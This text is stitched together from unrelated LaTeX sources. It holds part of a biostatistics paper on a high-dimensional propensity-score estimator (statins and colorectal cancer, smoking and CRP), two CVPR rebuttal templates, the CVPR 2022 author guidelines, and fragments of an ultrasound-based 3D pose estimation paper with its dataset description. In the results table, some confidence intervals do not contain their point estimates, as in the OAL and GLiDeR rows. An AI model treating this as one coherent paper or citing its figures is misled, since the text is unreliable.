We applied DiPS to assess the effect of statins, a medication for lowering cholesterol levels, on the risk of colorectal cancer (CRC) among patients with inflammatory bowel disease (IBD) identified from the EMRs of a large metropolitan healthcare provider. Previous studies have suggested that the use of statins has a protective effect on CRC \citep{liu2014association}, but few studies have considered the effect among IBD patients. The EMR cohort consisted of $n=10,817$ IBD patients, including 1,375 statin users. CRC status and statin use were ascertained by the presence of ICD9 diagnosis and electronic prescription codes. We adjusted for $p=15$ covariates as potential confounders, including age, gender, race, smoking status, indication of elevated inflammatory markers, examination with colonoscopy, use of biologics and immunomodulators, subtypes of IBD, disease duration, and presence of primary sclerosing cholangitis (PSC).
For the working model $\mathcal{M}_{\mu}$, we specified $g_{\mu}(u)=1/(1+e^{-u})$ to accommodate the binary outcome. SEs for the other estimators were obtained from the MAD over bootstrap resamples, except for DR-rLAS, whose SE was obtained directly from the bootstrap procedure implemented in \texttt{hdm}. CIs were calculated from percentile intervals, except for DR-rLAS, for which a normal approximation was used. We also calculated a two-sided p-value from a Wald test of the null that statins have no effect, using the point and SE estimates for each estimator. The unadjusted estimate (None), based on the difference in means between groups, was also calculated as a reference. The left side of Table \ref{tab:data} shows that, without adjustment, the naive risk difference is estimated to be -0.8\% with a SE of 0.4\%. The other methods estimated that statins had a protective effect ranging from around -1\% to -3\% after adjustment for covariates. DiPS and DR-rLAS were the most efficient estimators, with the estimated variances of the other estimators ranging from 13\% to more than 100\% higher than that of DiPS.
\begin{table}
\centering
\scalebox{0.85}{
\begin{tabular}{ccccccccc}
\toprule
\multicolumn{5}{c}{IBD EMR Study} & \multicolumn{4}{c}{FOS} \\
& \textbf{Est} & \textbf{SE} & \textbf{95\% CI} & \textbf{p-val} & \textbf{Est} & \textbf{SE} & \textbf{95\% CI} & \textbf{p-val} \\ \hline
None & -0.008 & 0.004 & (-0.017, 0) & 0.054 & 0.180 & 0.061 & (0.07, 0.291) & 0.003 \\
IPW-ALAS & -0.022 & 0.004 & (-0.03, -0.015) & $<$0.001 & 0.182 & 0.061 & (0.057, 0.299) & 0.003 \\
DR-ALAS & -0.020 & 0.005 & (-0.028, -0.012) & $<$0.001 & 0.140 & 0.063 & (0.038, 0.276) & 0.025 \\
DR-rLAS & -0.008 & 0.003 & (-0.015, -0.002) & 0.011 & 0.175 & 0.057 & (0.063, 0.288) & 0.002 \\
OAL & -0.031 & 0.004 & (-0.017, 0) & $<$0.001 & 0.147 & 0.062 & (0.062, 0.289) & 0.018 \\
GLiDeR & -0.018 & 0.005 & (-0.04, -0.022) & $<$0.001 & 0.128 & 0.053 & (0.035, 0.254) & 0.015 \\
MADR & -0.030 & 0.005 & (-0.041, -0.022) & $<$0.001 & 0.142 & 0.058 & (0.036, 0.253) & 0.015 \\
DiPS & -0.024 & 0.003 & (-0.03, -0.015) & $<$0.001 & 0.141 & 0.053 & (0.046, 0.272) & 0.008 \\
\bottomrule
\end{tabular}
}
\vspace{1.5em}
\caption{Data example on the effect of statins on CRC risk in EMR data and the effect of smoking on logCRP in FOS data. Est: Point estimate, SE: estimated SE, 95\% CI: confidence interval, p-val: p-value from Wald test of no effect.
}
\label{tab:data}
\end{table}
\subsection{Data Example: Framingham Offspring Study}
The Framingham Offspring Study (FOS) is a cohort study initiated in 1971 that enrolled 5,124 adult children and spouses of the original Framingham Heart Study participants. The study collected data over time on participants' medical history, physician examination, and laboratory tests to examine epidemiological and genetic risk factors of cardiovascular disease (CVD). A subset of the FOS participants also have their genotype from the Affymetrix 500K SNP array available through the Framingham SNP Health Association Resource (SHARe) on dbGaP. We were interested in assessing the effect of smoking on C-reactive protein (CRP), an inflammation marker highly predictive of CVD risk, while adjusting for potential confounders including gender, age, diabetes status, use of hypertensive medication, systolic and diastolic blood pressure measurements, and HDL and total cholesterol measurements, as well as a large number of SNPs in gene regions previously reported to be associated with inflammation or obesity. While the inflammation-related SNPs are not likely to be associated with smoking, we include them as efficiency covariates since they are likely to be related to CRP. SNPs that had missing values in $>1\%$ of the sample, as well as SNPs that had a correlation $>.99$ with other SNPs in the data, were removed from the covariates. A small proportion of individuals who still had missing values in SNPs had their values imputed with the mean value. The analysis includes $n=1,892$ individuals with available information on CRP and the $p=121$ covariates, of which 113 were SNPs.
Since CRP is heavily skewed, we applied a log transformation so that the linear regression model in $\mathcal{M}_{\mu}$ better fits the data. SEs, CIs, and p-values were calculated in the same way as in the above example. The right side of Table \ref{tab:data} shows that different methods agree that smoking significantly increases logCRP. In general, point estimates tended to attenuate after adjusting for covariates since smokers are likely to have other characteristics that increase inflammation. DiPS and GliDeR were among the most efficient, with DiPS achieving up to 39\% lower estimated variance than other estimators.
\section{Discussion} \label{s:discussion}
In this paper we developed a novel IPW-based approach to estimate the ATE that accommodates settings with high-dimensional covariates. Under sparsity assumptions and using appropriate regularization, the estimator achieves double-robustness and local semiparametric efficiency when adjusting for many covariates. By calibrating the initial PS through smoothing, we showed that additional gains in robustness and efficiency are guaranteed in large samples under misspecification of the working models. Simulation results demonstrate that DiPS performs comparably to existing approaches under correctly specified models but achieves potentially substantial gains in efficiency under model misspecification.
In numerical studies, we used the extended regularized information criterion \citep{hui2015tuning} to tune adaptive LASSO, which is shown to maintain selection consistency in the diverging-$p$ case when $\log(p)/\log(n) = \nu$, for $\nu\in [0,1)$. Other criteria such as cross-validation can also be used and may exhibit better performance in some cases. The bandwidth $h$ must be selected such that the dominating errors in the influence function, which are of order $O_p(n^{1/2}h^q + n^{-1/2}h^{-2})$, converge to $0$. This is satisfied for $h= O(n^{-\alpha})$ with $\alpha \in (\frac{1}{2q},\frac{1}{4})$. The optimal bandwidth $h^*$ is one that balances these bias and variance terms and is of order $h^*=O(n^{-1/(q+2)})$. In practice we use a plug-in estimator $\widehat{h}^* = \widehat{\sigma} n^{-1/(q+2)}$, where $\widehat{\sigma}$ is the sample standard deviation of either $\widehat{\balph}^{\sf \tiny T}\mathbf{X}_i$ or $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i$, possibly after applying a monotonic transformation. Cross-validation can also be used to obtain an optimal bandwidth for the smoothing itself, re-scaled to be of the optimal order.
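As a concrete illustration, the plug-in rule $\widehat{h}^* = \widehat{\sigma} n^{-1/(q+2)}$ is a one-liner; the sketch below (with a hypothetical function name) takes the fitted linear index values $\widehat{\balph}^{\sf \tiny T}\mathbf{X}_i$ or $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i$ as input.

```python
import numpy as np

def plugin_bandwidth(index_values, q=4):
    """Plug-in bandwidth h* = sigma_hat * n^(-1/(q+2)), where sigma_hat is
    the sample standard deviation of the fitted linear index values and
    q is the order of the kernel used for smoothing."""
    index_values = np.asarray(index_values, dtype=float)
    n = index_values.size
    sigma_hat = index_values.std(ddof=1)  # sample SD, as in the text
    return sigma_hat * n ** (-1.0 / (q + 2))
```

Any bandwidth of this order satisfies the rate condition above; scaling by $\widehat{\sigma}$ simply makes the constant adapt to the spread of the index.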
The second estimated direction $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ can be considered a working prognostic score \citep{hansen2008prognostic}. In the case where $\boldsymbol\beta_0=\boldsymbol\beta_1$ is postulated in the working outcome model \eqref{e:ormod} but, in actuality $\boldsymbol\beta_0\neq\boldsymbol\beta_1$, $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ could be a mixture of the true prognostic and propensity scores and may not be ancillary for the ATE. This could bias estimates of ATE when adjusting only for $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$. DiPS avoids this source of bias by adjusting for both the working PS $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$ and $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ so that consistency is still maintained in this case, provided the working PS model \eqref{e:psmod} is correct (i.e. under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$). Otherwise, if the PS model is also incorrect, no method is guaranteed to be consistent.
If adaptive LASSO is used to estimate $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ and the true $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ are of order $O(n^{-1/2})$, $\widehat{\balph}$ and $\widehat{\boldsymbol\beta}_k$ are not $n^{1/2}$-consistent when the penalty is tuned to achieve consistent model selection \citep{potscher2009distribution}. This is a limitation of relying on procedures that satisfy oracle properties only under fixed-parameter asymptotics. DiPS is thus preferred in situations where $n$ is large and signals are not extremely weak.
Moreover, if adaptive LASSO is used, when $\nu$ is large, a large power parameter $\gamma$ would be required to maintain the oracle properties, leading to an unstable penalty and potentially poor performance in finite samples.
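For reference, the rescaling trick behind adaptive LASSO with power parameter $\gamma$ can be sketched as follows: weight each covariate by $|\widehat{\beta}^{\rm init}_j|^{\gamma}$, solve a plain LASSO on the rescaled design, and map the solution back. This is an illustrative numpy-only coordinate-descent implementation assuming centered data and no intercept, not the tuning procedure used in the paper.

```python
import numpy as np

def soft(z, t):
    """Soft-thresholding operator."""
    return np.sign(z) * np.maximum(np.abs(z) - t, 0.0)

def adaptive_lasso(X, y, gamma=1.0, lam=0.1, iters=200):
    """Adaptive LASSO via column rescaling: penalizing
    lam * sum_j |b_j| / |beta_init_j|^gamma is equivalent to a plain
    LASSO on the rescaled columns X_j * |beta_init_j|^gamma.
    Assumes X and y are centered (no intercept)."""
    n, p = X.shape
    beta_init, *_ = np.linalg.lstsq(X, y, rcond=None)  # initial OLS fit
    w = np.abs(beta_init) ** gamma + 1e-12             # adaptive weights
    Xw = X * w
    col_sq = (Xw ** 2).sum(axis=0) / n
    b = np.zeros(p)
    for _ in range(iters):                             # coordinate descent
        for j in range(p):
            r = y - Xw @ b + Xw[:, j] * b[j]           # partial residual
            b[j] = soft(Xw[:, j] @ r / n, lam) / col_sq[j]
    return b * w                                       # original scale
```

The instability discussed above is visible here: when an initial coefficient is near zero, a large $\gamma$ makes its weight, and hence its effective penalty, explode.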
It would be of interest to consider other approaches to estimate $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ that have good performance in broader settings, such as settings allowing for larger $p$ and more general sparsity assumptions. It would also be of interest to extend the approach to accommodate survival data.
\backmatter
\bibliographystyle{biom}
\section{Introduction}
After receiving paper reviews, authors may optionally submit a rebuttal to address the reviewers' comments, which will be limited to a {\bf one page} PDF file. Please follow the steps and style guidelines outlined below for submitting your author response.
Note that the author rebuttal is optional and, following similar guidelines to previous CVPR conferences, it is meant to provide you with an opportunity to rebut factual errors or to supply additional information requested by the reviewers. It is NOT intended to add new contributions (theorems, algorithms, experiments) that were not included in the original submission. You may optionally add a figure, graph or proof to your rebuttal to better illustrate your answer to the reviewers' comments.
Per a passed 2018 PAMI-TC motion, reviewers should not request additional experiments for the rebuttal, or penalize authors for lack of additional experiments. This includes any experiments that involve running code, e.g., to create tables or figures with new results. \textbf{Authors should not include new experimental results in the rebuttal}, and reviewers should discount any such results when making their final recommendation. Authors may include figures with illustrations or comparison tables of results reported in the submission/supplemental material or in other papers.
The rebuttal must adhere to the same blind-submission as the original submission and must comply with this rebuttal-formatted template.
\subsection{Response length}
Author responses must be no longer than 1 page in length including any references and figures. Overlength responses will simply not be reviewed. This includes responses where the margins and formatting are deemed to have been significantly altered from those laid down by this style guide. Note that this \LaTeX\ guide already sets figure captions and references in a smaller font.
\section{Formatting your Response}
{\bf Make sure to update the paper title and paper ID in the appropriate place in the tex file.}
All text must be in a two-column format. The total allowable width of the text
area is $6\frac78$ inches (17.5 cm) wide by $8\frac78$ inches (22.54 cm) high.
Columns are to be $3\frac14$ inches (8.25 cm) wide, with a $\frac{5}{16}$ inch
(0.8 cm) space between them. The top margin should begin
1.0 inch (2.54 cm) from the top edge of the page. The bottom margin should be
1-1/8 inches (2.86 cm) from the bottom edge of the page for $8.5 \times
11$-inch paper; for A4 paper, approximately 1-5/8 inches (4.13 cm) from the
bottom edge of the page.
Please number all of your sections and any displayed equations. It is important
for readers to be able to refer to any particular equation.
Wherever Times is specified, Times Roman may also be used. Main text should be
in 10-point Times, single-spaced. Section headings should be in 10 or 12 point
Times. All paragraphs should be indented 1 pica (approx. 1/6 inch or 0.422
cm). Figure and table captions should be 9-point Roman type as in
Figure~\ref{fig:onecol}.
List and number all bibliographical references in 9-point Times, single-spaced,
at the end of your response. When referenced in the text, enclose the citation
number in square brackets, for example~\cite{Authors14}. Where appropriate,
include the name(s) of editors of referenced books.
\begin{figure}[t]
\begin{center}
\fbox{\rule{0pt}{1in} \rule{0.9\linewidth}{0pt}}
\end{center}
\caption{Example of caption. It is set in Roman so that mathematics
(always set in Roman: $B \sin A = A \sin B$) may be included without an
ugly clash.}
\label{fig:long}
\label{fig:onecol}
\end{figure}
\subsection{Illustrations, graphs, and photographs}
All graphics should be centered. Please ensure that any point you wish to make is resolvable in a printed copy of the response. Resize fonts in figures to match the font in the body text, and choose line widths which render effectively in print. Many readers (and reviewers), even of an electronic copy, will choose to print your response in order to read it. You cannot insist that they do otherwise, and therefore must not assume that they can zoom in to see tiny details on a graphic.
When placing figures in \LaTeX, it's almost always best to use \verb+\includegraphics+, and to specify the figure width as a multiple of the line width as in the example below
{\small\begin{verbatim}
\usepackage[dvips]{graphicx} ...
\includegraphics[width=0.8\linewidth]
{myfile.eps}
\end{verbatim}
}
{\small
\bibliographystyle{ieee_fullname}
\section{Introduction}
After receiving paper reviews, authors may optionally submit a rebuttal to address the reviewers' comments, which will be limited to a {\bf one page} PDF file.
Please follow the steps and style guidelines outlined below for submitting your author response.
The author rebuttal is optional and, following similar guidelines to previous CVPR conferences, is meant to provide you with an opportunity to rebut factual errors or to supply additional information requested by the reviewers.
It is NOT intended to add new contributions (theorems, algorithms, experiments) that were absent in the original submission and NOT specifically requested by the reviewers.
You may optionally add a figure, graph, or proof to your rebuttal to better illustrate your answer to the reviewers' comments.
Per a passed 2018 PAMI-TC motion, reviewers should refrain from requesting significant additional experiments for the rebuttal or penalize for lack of additional experiments.
Authors should refrain from including new experimental results in the rebuttal, especially when not specifically requested to do so by the reviewers.
Authors may include figures with illustrations or comparison tables of results reported in the submission/supplemental material or in other papers.
Just like the original submission, the rebuttal must maintain anonymity and cannot include external links that reveal the author identity or circumvent the length restriction.
The rebuttal must comply with this template (the use of sections is not required, though it is recommended to structure the rebuttal for ease of reading).
\subsection{Response length}
Author responses must be no longer than 1 page in length including any references and figures.
Overlength responses will simply not be reviewed.
This includes responses where the margins and formatting are deemed to have been significantly altered from those laid down by this style guide.
Note that this \LaTeX\ guide already sets figure captions and references in a smaller font.
\section{Formatting your Response}
{\bf Make sure to update the paper title and paper ID in the appropriate place in the tex file.}
All text must be in a two-column format.
The total allowable size of the text area is $6\frac78$ inches (17.46 cm) wide by $8\frac78$ inches (22.54 cm) high.
Columns are to be $3\frac14$ inches (8.25 cm) wide, with a $\frac{5}{16}$ inch (0.8 cm) space between them.
The top margin should begin 1 inch (2.54 cm) from the top edge of the page.
The bottom margin should be $1\frac{1}{8}$ inches (2.86 cm) from the bottom edge of the page for $8.5 \times 11$-inch paper;
for A4 paper, approximately $1\frac{5}{8}$ inches (4.13 cm) from the bottom edge of the page.
Please number any displayed equations.
It is important for readers to be able to refer to any particular equation.
Wherever Times is specified, Times Roman may also be used.
Main text should be in 10-point Times, single-spaced.
Section headings should be in 10 or 12 point Times.
All paragraphs should be indented 1 pica (approx.~$\frac{1}{6}$ inch or 0.422 cm).
Figure and table captions should be 9-point Roman type as in \cref{fig:onecol}.
List and number all bibliographical references in 9-point Times, single-spaced,
at the end of your response.
When referenced in the text, enclose the citation number in square brackets, for example~\cite{Alpher05}.
Where appropriate, include the name(s) of editors of referenced books.
\begin{figure}[t]
\centering
\fbox{\rule{0pt}{0.5in} \rule{0.9\linewidth}{0pt}}
\caption{Example of caption. It is set in Roman so that mathematics
(always set in Roman: $B \sin A = A \sin B$) may be included without an
ugly clash.}
\label{fig:onecol}
\end{figure}
To avoid ambiguities, it is best if the numbering for equations, figures, tables, and references in the author response does not overlap with that in the main paper (the reviewer may wonder if you talk about \cref{fig:onecol} in the author response or in the paper).
See \LaTeX\ template for a workaround.
\subsection{Illustrations, graphs, and photographs}
All graphics should be centered.
Please ensure that any point you wish to make is resolvable in a printed copy of the response.
Resize fonts in figures to match the font in the body text, and choose line widths which render effectively in print.
Readers (and reviewers), even of an electronic copy, may choose to print your response in order to read it.
You cannot insist that they do otherwise, and therefore must not assume that they can zoom in to see tiny details on a graphic.
When placing figures in \LaTeX, it is almost always best to use \verb+\includegraphics+, and to specify the figure width as a multiple of the line width as in the example below
{\small\begin{verbatim}
\usepackage{graphicx} ...
\includegraphics[width=0.8\linewidth]
{myfile.pdf}
\end{verbatim}
}
{\small
\bibliographystyle{ieee_fullname}
\section{Conclusion \label{sec:conc}}
This paper explored the possibility of adding ultrasound audio as a new modality for metric-scale 3D human pose estimation. By estimating an audio pose kernel and encoding it into physical space, we introduced a neural network pipeline that can accurately predict metric-scale 3D human pose. We tested our algorithm in two unseen environments, and the results are promising, shedding light on potential applications in smart homes, AR/VR, human-robot interaction, and beyond. We also proposed a new dataset, PoseKernel, calling the attention of future researchers to this interesting audio-visual 3D pose estimation problem.
\section{Introduction}
Please follow the steps outlined below when submitting your manuscript to
the IEEE Computer Society Press. This style guide now has several
important modifications (for example, you are no longer warned against the
use of sticky tape to attach your artwork to the paper), so all authors
should read this new version.
\subsection{Language}
All manuscripts must be in English.
\subsection{Dual submission}
Please refer to the author guidelines on the 2022~web page for a
discussion of the policy on dual submissions.
\subsection{Paper length}
Papers, excluding the references section,
must be no longer than eight pages in length. The references section
will not be included in the page count, and there is no limit on the
length of the references section. For example, a paper of eight pages
with two pages of references would have a total length of 10 pages.
{\bf There will be no extra page charges for 2022.}
Overlength papers will simply not be reviewed. This includes papers
where the margins and formatting are deemed to have been significantly
altered from those laid down by this style guide. Note that this
\LaTeX\ guide already sets figure captions and references in a smaller font.
The reason such papers will not be reviewed is that there is no provision for
supervised revisions of manuscripts. The reviewing process cannot determine
the suitability of the paper for presentation in eight pages if it is
reviewed in eleven.
\subsection{The ruler}
The \LaTeX\ style defines a printed ruler which should be present in the
version submitted for review. The ruler is provided in order that
reviewers may comment on particular lines in the paper without
circumlocution. If you are preparing a document using a non-\LaTeX\
document preparation system, please arrange for an equivalent ruler to
appear on the final output pages. The presence or absence of the ruler
should not change the appearance of any other content on the page. The
camera ready copy should not contain a ruler.
(\LaTeX\ users may use options of cvpr.cls to switch between different
versions.)
Reviewers:
note that the ruler measurements do not align well with lines in the paper
--- this turns out to be very difficult to do well when the paper contains
many figures and equations, and, when done, looks ugly. Just use fractional
references (e.g.\ this line is $095.5$), although in most cases one would
expect that the approximate location will be adequate.
\subsection{Mathematics}
Please number all of your sections and displayed equations. It is
important for readers to be able to refer to any particular equation. Just
because you didn't refer to it in the text doesn't mean some future reader
might not need to refer to it. It is cumbersome to have to use
circumlocutions like ``the equation second from the top of page 3 column
1''. (Note that the ruler will not be present in the final copy, so is not
an alternative to equation numbers). All authors will benefit from reading
Mermin's description of how to write mathematics:
\url{http://www.pamitc.org/documents/mermin.pdf}.
\subsection{Blind review}
Many authors misunderstand the concept of anonymizing for blind
review. Blind review does not mean that one must remove
citations to one's own work---in fact it is often impossible to
review a paper unless the previous citations are known and
available.
Blind review means that you do not use the words ``my'' or ``our''
when citing previous work. That is all. (But see below for
techreports.)
Saying ``this builds on the work of Lucy Smith [1]'' does not say
that you are Lucy Smith; it says that you are building on her
work. If you are Smith and Jones, do not say ``as we show in
[7]'', say ``as Smith and Jones show in [7]'' and at the end of the
paper, include reference 7 as you would any other cited work.
An example of a bad paper just asking to be rejected:
\begin{quote}
\begin{center}
An analysis of the frobnicatable foo filter.
\end{center}
In this paper we present a performance analysis of our
previous paper [1], and show it to be inferior to all
previously known methods. Why the previous paper was
accepted without this analysis is beyond me.
[1] Removed for blind review
\end{quote}
An example of an acceptable paper:
\begin{quote}
\begin{center}
An analysis of the frobnicatable foo filter.
\end{center}
In this paper we present a performance analysis of the
paper of Smith \etal [1], and show it to be inferior to
all previously known methods. Why the previous paper
was accepted without this analysis is beyond me.
[1] Smith, L and Jones, C. ``The frobnicatable foo
filter, a fundamental contribution to human knowledge''.
Nature 381(12), 1-213.
\end{quote}
If you are making a submission to another conference at the same time,
which covers similar or overlapping material, you may need to refer to that
submission in order to explain the differences, just as you would if you
had previously published related work. In such cases, include the
anonymized parallel submission~\cite{Authors14} as additional material and
cite it as
\begin{quote}
[1] Authors. ``The frobnicatable foo filter'', F\&G 2014 Submission ID 324,
Supplied as additional material {\tt fg324.pdf}.
\end{quote}
Finally, you may feel you need to tell the reader that more details can be
found elsewhere, and refer them to a technical report. For conference
submissions, the paper must stand on its own, and not {\em require} the
reviewer to go to a techreport for further details. Thus, you may say in
the body of the paper ``further details may be found
in~\cite{Authors14b}''. Then submit the techreport as additional material.
Again, you may not assume the reviewers will read this material.
Sometimes your paper is about a problem which you tested using a tool which
is widely known to be restricted to a single institution. For example,
let's say it's 1969, you have solved a key problem on the Apollo lander,
and you believe that the CVPR70 audience would like to hear about your
solution. The work is a development of your celebrated 1968 paper entitled
``Zero-g frobnication: How being the only people in the world with access to
the Apollo lander source code makes us a wow at parties'', by Zeus \etal.
You can handle this paper like any other. Don't write ``We show how to
improve our previous work [Anonymous, 1968]. This time we tested the
algorithm on a lunar lander [name of lander removed for blind review]''.
That would be silly, and would immediately identify the authors. Instead
write the following:
\begin{quotation}
\noindent
We describe a system for zero-g frobnication. This
system is new because it handles the following cases:
A, B. Previous systems [Zeus et al. 1968] didn't
handle case B properly. Ours handles it by including
a foo term in the bar integral.
...
The proposed system was integrated with the Apollo
lunar lander, and went all the way to the moon, don't
you know. It displayed the following behaviours
which show how well we solved cases A and B: ...
\end{quotation}
As you can see, the above text follows standard scientific convention,
reads better than the first version, and does not explicitly name you as
the authors. A reviewer might think it likely that the new paper was
written by Zeus \etal, but cannot make any decision based on that guess.
He or she would have to be sure that no other authors could have been
contracted to solve problem B.
\medskip
\noindent
FAQ\medskip\\
{\bf Q:} Are acknowledgements OK?\\
{\bf A:} No. Leave them for the final copy.\medskip\\
{\bf Q:} How do I cite my results reported in open challenges?\\
{\bf A:} To conform with the double blind review policy, you can report results of other challenge participants together with your results in your paper. For your results, however, you should not identify yourself and should not mention your participation in the challenge. Instead present your results referring to the method proposed in your paper and draw conclusions based on the experimental comparison to other results.\medskip\\
\begin{figure}[t]
\begin{center}
\fbox{\rule{0pt}{2in} \rule{0.9\linewidth}{0pt}}
\end{center}
\caption{Example of caption. It is set in Roman so that mathematics
(always set in Roman: $B \sin A = A \sin B$) may be included without an
ugly clash.}
\label{fig:long}
\label{fig:onecol}
\end{figure}
\subsection{Miscellaneous}
\noindent
Compare the following:\\
\begin{tabular}{ll}
\verb'$conf_a$' & $conf_a$ \\
\verb'$\mathit{conf}_a$' & $\mathit{conf}_a$
\end{tabular}\\
See The \TeX book, p165.
The space after \eg, meaning ``for example'', should not be a
sentence-ending space. So \eg is correct, {\em e.g.} is not. The provided
\verb'\eg' macro takes care of this.
When citing a multi-author paper, you may save space by using ``et alia'',
shortened to ``\etal'' (not ``{\em et.\ al.}'' as ``{\em et}'' is a complete word.)
However, use it only when there are three or more authors. Thus, the
following is correct: ``
Frobnication has been trendy lately.
It was introduced by Alpher~\cite{Alpher02}, and subsequently developed by
Alpher and Fotheringham-Smythe~\cite{Alpher03}, and Alpher \etal~\cite{Alpher04}.''
This is incorrect: ``... subsequently developed by Alpher \etal~\cite{Alpher03} ...''
because reference~\cite{Alpher03} has just two authors. If you use the
\verb'\etal' macro provided, then you need not worry about double periods
when used at the end of a sentence as in Alpher \etal.
For this citation style, keep multiple citations in numerical (not
chronological) order, so prefer \cite{Alpher03,Alpher02,Authors14} to
\cite{Alpher02,Alpher03,Authors14}.
\begin{figure*}
\begin{center}
\fbox{\rule{0pt}{2in} \rule{.9\linewidth}{0pt}}
\end{center}
\caption{Example of a short caption, which should be centered.}
\label{fig:short}
\end{figure*}
\section{Formatting your paper}
All text must be in a two-column format. The total allowable width of the
text area is $6\frac78$ inches (17.5 cm) wide by $8\frac78$ inches (22.54
cm) high. Columns are to be $3\frac14$ inches (8.25 cm) wide, with a
$\frac{5}{16}$ inch (0.8 cm) space between them. The main title (on the
first page) should begin 1.0 inch (2.54 cm) from the top edge of the
page. The second and following pages should begin 1.0 inch (2.54 cm) from
the top edge. On all pages, the bottom margin should be 1-1/8 inches (2.86
cm) from the bottom edge of the page for $8.5 \times 11$-inch paper; for A4
paper, approximately 1-5/8 inches (4.13 cm) from the bottom edge of the
page.
\subsection{Margins and page numbering}
All printed material, including text, illustrations, and charts, must be kept
within a print area 6-7/8 inches (17.5 cm) wide by 8-7/8 inches (22.54 cm)
high.
Page numbers should appear in the footer, centered, 0.75 inches from the
bottom of the page, and should start at your assigned page number rather
than the 4321 in the example. To do this, find the line (around line 20)
\begin{verbatim}
\setcounter{page}{4321}
\end{verbatim}
where the number 4321 is your assigned starting page.
\subsection{Type-style and fonts}
Wherever Times is specified, Times Roman may also be used. If neither is
available on your word processor, please use the font closest in
appearance to Times to which you have access.
MAIN TITLE. Center the title 1-3/8 inches (3.49 cm) from the top edge of
the first page. The title should be in Times 14-point, boldface type.
Capitalize the first letter of nouns, pronouns, verbs, adjectives, and
adverbs; do not capitalize articles, coordinate conjunctions, or
prepositions (unless the title begins with such a word). Leave two blank
lines after the title.
AUTHOR NAME(s) and AFFILIATION(s) are to be centered beneath the title
and printed in Times 12-point, non-boldface type. This information is to
be followed by two blank lines.
The ABSTRACT and MAIN TEXT are to be in a two-column format.
MAIN TEXT. Type main text in 10-point Times, single-spaced. Do NOT use
double-spacing. All paragraphs should be indented 1 pica (approx. 1/6
inch or 0.422 cm). Make sure your text is fully justified---that is,
flush left and flush right. Please do not place any additional blank
lines between paragraphs.
Figure and table captions should be 9-point Roman type as in
Figures~\ref{fig:onecol} and~\ref{fig:short}. Short captions should be centred.
\noindent Callouts should be 9-point Helvetica, non-boldface type.
Initially capitalize only the first word of section titles and first-,
second-, and third-order headings.
FIRST-ORDER HEADINGS. (For example, {\large \bf 1. Introduction})
should be Times 12-point boldface, initially capitalized, flush left,
with one blank line before, and one blank line after.
SECOND-ORDER HEADINGS. (For example, { \bf 1.1. Database elements})
should be Times 11-point boldface, initially capitalized, flush left,
with one blank line before, and one after. If you require a third-order
heading (we discourage it), use 10-point Times, boldface, initially
capitalized, flush left, preceded by one blank line, followed by a period
and your text on the same line.
\subsection{Footnotes}
Please use footnotes\footnote {This is what a footnote looks like. It
often distracts the reader from the main flow of the argument.} sparingly.
Indeed, try to avoid footnotes altogether and include necessary peripheral
observations in
the text (within parentheses, if you prefer, as in this sentence). If you
wish to use a footnote, place it at the bottom of the column on the page on
which it is referenced. Use Times 8-point type, single-spaced.
\subsection{References}
List and number all bibliographical references in 9-point Times,
single-spaced, at the end of your paper. When referenced in the text,
enclose the citation number in square brackets, for
example~\cite{Authors14}. Where appropriate, include the name(s) of
editors of referenced books.
\begin{table}
\begin{center}
\begin{tabular}{|l|c|}
\hline
Method & Frobnability \\
\hline\hline
Theirs & Frumpy \\
Yours & Frobbly \\
Ours & Makes one's heart Frob\\
\hline
\end{tabular}
\end{center}
\caption{Results. Ours is better.}
\end{table}
\subsection{Illustrations, graphs, and photographs}
All graphics should be centered. Please ensure that any point you wish to
make is resolvable in a printed copy of the paper. Resize fonts in figures
to match the font in the body text, and choose line widths which render
effectively in print. Many readers (and reviewers), even of an electronic
copy, will choose to print your paper in order to read it. You cannot
insist that they do otherwise, and therefore must not assume that they can
zoom in to see tiny details on a graphic.
When placing figures in \LaTeX, it's almost always best to use
\verb+\includegraphics+, and to specify the figure width as a multiple of
the line width as in the example below
{\small\begin{verbatim}
\usepackage[dvips]{graphicx} ...
\includegraphics[width=0.8\linewidth]
{myfile.eps}
\end{verbatim}
}
\subsection{Color}
Please refer to the author guidelines on the 2022~web page for a discussion
of the use of color in your document.
\section{Final copy}
You must include your signed IEEE copyright release form when you submit
your finished paper. We MUST have this form before your paper can be
published in the proceedings.
Please direct any questions to the production editor in charge of these
proceedings at the IEEE Computer Society Press:
\url{https://www.computer.org/about/contact}.
{\small
\bibliographystyle{ieee_fullname}
\section{PoseKernel Dataset}
We collect a new dataset called the \textit{PoseKernel} dataset. It is composed of more than 10,000 frames of synchronized video and audio from six locations, including a living room, office, conference room, and laboratory. For each location, more than six participants were asked to perform a variety of activities, as shown in Figure~\ref{fig:environments}. (We plan to release the dataset when the paper is published.)
\begin{figure}[t]
\centering
\includegraphics[width=\linewidth]{environments.PNG}
\caption{We collect our PoseKernel dataset in different environments with at least six participants per location, totalling more than 10,000 poses. }
\label{fig:environments}
\end{figure}
The cameras, speakers, and microphones are spatially calibrated using off-the-shelf structure-from-motion software such as COLMAP~\cite{schoenberger2016sfm} by scanning the environments with an additional camera and using the metric depth from the RGB-D cameras to estimate the true scale of the 3D reconstruction. We manually synchronize the videos and speakers by a distinctive audio signal, e.g., clapping, and the speakers and microphones are hardware-synchronized by a field recorder (e.g., a Zoom F8n recorder) at a sample rate of 96 kHz.
For each scene, video data are captured by two RGB-D Azure Kinect cameras. These calibrated RGB-D cameras are used to estimate the ground-truth 3D body pose using state-of-the-art pose estimation methods such as FrankMocap~\cite{rong2021frankmocap}. Multiple RGB-D videos are used only to generate the ground-truth pose for training. In the testing phase, only a single RGB video is used.
Four speakers and four microphones are used to generate and record the audio signals. Each speaker generates a chirp signal sweeping from 19 kHz to 32 kHz. We use this frequency band because it is recordable by consumer-grade microphones yet inaudible to humans, so it does not interfere with human-generated audio. To transmit multiple audio signals from the four speakers simultaneously, we use frequency-division multiplexing within this band. Each chirp lasts 100 ms, resulting in 10 FPS reconstruction. At the beginning of every capture session, we record the empty-room impulse response for each microphone in the absence of humans.
